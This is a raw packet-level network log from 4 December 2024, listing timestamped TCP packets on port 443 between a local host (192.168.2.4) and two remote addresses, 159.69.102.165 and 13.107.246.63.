Dec 4, 2024 12:17:43.770467043 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770478964 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770560980 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770576000 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770586014 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770595074 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770689011 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770700932 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770726919 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770736933 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770958900 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770986080 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770991087 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.771003008 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:44.130106926 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.130863905 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.130880117 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.131336927 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.131340027 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.382507086 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.382989883 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.383018017 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.383480072 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.383486986 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.573472023 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.577049971 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.577105045 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.577146053 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.577200890 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.583673000 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.634423018 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.639723063 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.639830112 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.639890909 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.743395090 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.743417025 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.743433952 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.743439913 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.752497911 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.752513885 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.756670952 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.756675959 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.756900072 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.756906986 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.756920099 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.756923914 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.816529036 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.820168018 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.820230007 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.879738092 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:44.879817963 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:44.893783092 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.893812895 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.893825054 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:44.893831015 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.911784887 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:44.962531090 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.080629110 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.084939003 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.084986925 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.085021019 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.085048914 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.218128920 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.218147993 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.223927975 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.223947048 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.224852085 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.224858046 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.225543976 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.225572109 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.225636005 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.225825071 CET	49872	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.225841045 CET	443	49872	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.226236105 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.226253986 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.226269960 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.226274967 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.228799105 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.228805065 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.228878021 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.228888988 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.228897095 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.228900909 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.228980064 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.228996038 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229005098 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229012012 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229105949 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229120970 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229140997 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229156017 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229195118 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229211092 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229283094 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229299068 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229316950 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229324102 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229358912 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229371071 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229389906 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229415894 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229518890 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229527950 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229547024 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229557037 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229568005 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229577065 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229609966 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229623079 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.229638100 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.229657888 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.230638981 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.230669975 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.230729103 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.231381893 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.231400013 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.231457949 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.234479904 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.234503984 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.234549999 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.236367941 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236377001 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236402988 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236409903 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236429930 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236442089 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236489058 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236495972 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236520052 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236527920 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236543894 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236553907 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236599922 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236608982 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.236632109 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236654997 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236680984 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236681938 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236699104 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236738920 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236757994 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.236891031 CET	49873	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.236905098 CET	443	49873	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.237015963 CET	49874	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.237031937 CET	443	49874	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.237677097 CET	49875	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.237689972 CET	443	49875	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.243777037 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.243782043 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.245004892 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245013952 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.245031118 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245038033 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.245060921 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245090961 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245244026 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245266914 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245376110 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245469093 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245508909 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245556116 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245606899 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245621920 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245677948 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245899916 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245912075 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245929956 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.245970964 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.246042967 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.259406090 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.291342974 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.291511059 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.291589022 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.291596889 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.291620970 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.306606054 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.335339069 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.469696999 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.469822884 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.469836950 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.469891071 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.469928980 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.469949007 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.469976902 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.470057011 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.515331030 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.515469074 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.540450096 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.543437004 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.543514967 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.543566942 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.543591976 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.543621063 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.543627977 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.546325922 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.546374083 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.546454906 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.546602964 CET	49876	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:45.546617031 CET	443	49876	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:45.563332081 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.573561907 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.573631048 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.573637962 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.573693037 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.574573994 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.574587107 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.575150013 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.575185061 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.575244904 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.575484037 CET	49877	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.575501919 CET	443	49877	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.591032982 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.591176987 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.591187000 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.591212034 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.591289043 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.591310024 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.591330051 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.591456890 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.639333963 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.710361958 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.710472107 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.710530043 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.710556984 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.710591078 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.710608959 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.710616112 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.710639000 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.710664034 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.710705996 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.710737944 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.711400032 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.711416006 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.711507082 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.711534023 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.711657047 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.711678028 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.711824894 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.755331993 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.831357956 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.831562042 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.831588984 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.831722021 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.832427025 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.832545996 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.832561970 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.832598925 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.832736969 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.832767010 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.832891941 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.832921028 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.834517956 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.834592104 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.834707022 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.834743977 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.834886074 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.837929010 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.838033915 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.838042021 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.838066101 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.838140011 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.838179111 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.838196993 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.838299036 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.873016119 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.873155117 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.873203993 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.873352051 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.873388052 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.915334940 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.915433884 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.952501059 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.952522993 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.952646017 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.952702999 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.952816963 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.952850103 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.953000069 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.955530882 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.955598116 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.955730915 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.955774069 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.955795050 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.955856085 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.955893993 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.957664967 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.957711935 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.957815886 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.957875013 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.957926989 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.957983017 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.958026886 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.959275007 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.959362984 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.959425926 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.959518909 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.959563017 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.959657907 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.959681988 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.959796906 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.962608099 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.962626934 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.962713003 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.962742090 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.962790012 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.962820053 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.962838888 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.962868929 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.962945938 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.962954998 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.962985992 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.963036060 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.963076115 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.963082075 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.965233088 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.965327024 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.965445995 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.965483904 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.965605021 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993041992 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.993061066 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.993208885 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993240118 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.993350983 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993357897 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:45.993377924 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993428946 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993443012 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993490934 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993511915 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993520021 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:45.993776083 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.035337925 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.035465002 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.069266081 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.069333076 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.069431067 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.069468021 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:46.069560051 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:46.069582939 CET	443	49871	159.69.102.165	192.168.2.4
